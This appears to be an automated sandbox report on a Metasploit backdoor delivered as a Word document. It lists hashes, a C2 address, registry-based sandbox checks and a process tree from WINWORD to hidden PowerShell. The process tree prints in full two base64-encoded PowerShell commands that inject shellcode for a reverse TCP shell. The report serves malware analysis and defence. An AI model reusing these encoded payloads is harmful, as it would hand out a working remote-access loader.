metasploit | 3185876cb0717e3d8d6afadc8cbb2d439ad01cc3f4e172936b0d0ebc398c082c

General

Target

007376899.doc
Size

44KB
MD5

608d39b18b489fa10792a8de9352159c
SHA1

d1032109625af32b329e32a255212253467ebe91
SHA256

3185876cb0717e3d8d6afadc8cbb2d439ad01cc3f4e172936b0d0ebc398c082c
SHA512

8c036416d4bda2cd3c422dcf20aa3d3479fc8423b75ccf4ee0f8e32307a4060423cbef08a94d9e21a6ef101dafb0fd889530b6a226ce86d8b535b8d61dbeff72
SSDEEP

384:JN3vsOiShav9M18m01y/6mqfoQh5khMP+BQaiPi6r84Ph4igyVkjM50j013t:J+9AP/bu5K3iPi6J7Hkj4j1

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

52.14.18.129:10324

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	1480	2324	powershell.exe	82

Blocklisted process makes network request 10 IoCs

flow	pid	Process
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe
20	2632	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2324	WINWORD.EXE
2324	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1480	powershell.exe
1480	powershell.exe
2632	powershell.exe
2632	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2324	WINWORD.EXE
2324	WINWORD.EXE
2324	WINWORD.EXE
2324	WINWORD.EXE
2324	WINWORD.EXE
2324	WINWORD.EXE
2324	WINWORD.EXE
2324	WINWORD.EXE

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2324 wrote to memory of 1480	2324	WINWORD.EXE	83
PID 2324 wrote to memory of 1480	2324	WINWORD.EXE	83
PID 1480 wrote to memory of 2632	1480	powershell.exe	85
PID 1480 wrote to memory of 2632	1480	powershell.exe	85
PID 1480 wrote to memory of 2632	1480	powershell.exe	85
PID 2632 wrote to memory of 3408	2632	powershell.exe	86
PID 2632 wrote to memory of 3408	2632	powershell.exe	86
PID 2632 wrote to memory of 3408	2632	powershell.exe	86
PID 3408 wrote to memory of 3512	3408	csc.exe	87
PID 3408 wrote to memory of 3512	3408	csc.exe	87
PID 3408 wrote to memory of 3512	3408	csc.exe	87

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\007376899.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoE -NoP -NonI -W Hidden -E JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAZgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADYANAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADMAMAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADQAOQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAA1ADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGMALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4AGEAYwAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANAAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlADkALAAwAHgAOAAwACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgAMwAzACwAMAB4ADMAMgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANwAzACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAOAA5ACwAMAB4AGUAOAAsADAAeABmAGYALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AGMANAAsADAAeAA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALAAwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADYAOAAsADAAeAAzADQALAAwAHgAMABlACwAMAB4ADEAMgAsADAAeAA4ADEALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeAAwADAALAAwAHgAMgA4ACwAMAB4ADUANAAsADAAeAA4ADkALAAwAHgAZQA2ACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANwAsADAAeAA2AGEALAAwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADAAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOABiACwAMAB4ADMANgAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4ADcANQAsADAAeABlAGUALAAwAHgAYwAzADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADEAKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADgANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAG8AbgBpACAALQBlAG4AYwAiADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA==
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABjACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgAwACwAMAB4ADUAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADgALAAwAHgAMQA4ACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAYQBjACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALAAwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA3ADMALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeAA4ADkALAAwAHgAZQA4ACwAMAB4AGYAZgAsADAAeABkADAALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeAAwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyADkALAAwAHgAYwA0ACwAMAB4ADUANAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADIAOQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANgA4ACwAMAB4ADMANAAsADAAeAAwAGUALAAwAHgAMQAyACwAMAB4ADgAMQAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4ADAAMAAsADAAeAAyADgALAAwAHgANQA0ACwAMAB4ADgAOQAsADAAeABlADYALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAZQBhACwAMAB4ADAAZgAsADAAeABkAGYALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA3ACwAMAB4ADYAYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAOQA5ACwAMAB4AGEANQAsADAAeAA3ADQALAAwAHgANgAxACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAMABjACwAMAB4AGYAZgAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4AGIALAAwAHgAMwA2ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADIAOQAsADAAeABjADYALAAwAHgANwA1ACwAMAB4AGUAZQAsADAAeABjADMAOwAkAHMAaQB6AGUAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHMAaQB6AGUAIAA9ACAAJABzAGMALgBMAGUAbgBnAHQAaAB9ADsAJAB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAcwBpAHoAZQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHMAYwBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jbjhla1g\jbjhla1g.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3408
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB182.tmp" "c:\Users\Admin\AppData\Local\Temp\jbjhla1g\CSCCF20613E3CAD48B09CF176308819031.TMP"
        5⤵
        
        PID:3512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB182.tmp

Filesize
1KB

MD5
a65ea20f8990a7ddf61770ac5ebd7a7e

SHA1
c934b86c421ac48cccd7948283559d8956f5a306

SHA256
ca7c9df621d320861d72f25a947d8bc56323c21bac5570b4c1035592353f2424

SHA512
